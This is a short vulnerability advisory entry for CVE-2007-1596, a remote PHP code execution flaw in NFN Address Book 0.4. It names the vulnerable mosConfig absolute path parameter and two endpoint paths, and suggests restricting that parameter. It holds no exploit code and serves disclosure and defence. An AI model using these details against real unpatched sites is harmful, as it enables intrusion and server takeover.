PT-2007-2978 · Nfn · Nfn Address Book

Cold Zero

Published

2007-03-22

Updated

2017-10-11

CVE-2007-1596

CVSS v2.0

9.3

High

Vector

AV:N/AC:M/Au:N/C:C/I:C/A:C

Name of the Vulnerable Software and Affected Versions NFN Address Book (com nfn addressbook) version 0.4

Description The issue allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig absolute path parameter to specific API endpoints, such as "/components/com nfn addressbook/nfnaddressbook.php" or "/administrator/components/com nfn addressbook/nfnaddressbook.php".

Recommendations For NFN Address Book (com nfn addressbook) version 0.4, consider restricting access to the mosConfig absolute path parameter in the affected API endpoints until a patch is available. As a temporary workaround, avoid using the mosConfig absolute path parameter in the "/components/com nfn addressbook/nfnaddressbook.php" and "/administrator/components/com nfn addressbook/nfnaddressbook.php" endpoints to minimize the risk of exploitation.

Exploit

Fix

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Related Identifiers

CVE-2007-1596

Affected Products

Nfn Address Book

PT-2007-2978 · Nfn · Nfn Address Book

CVE-2007-1596

Related Identifiers

Affected Products

References · 7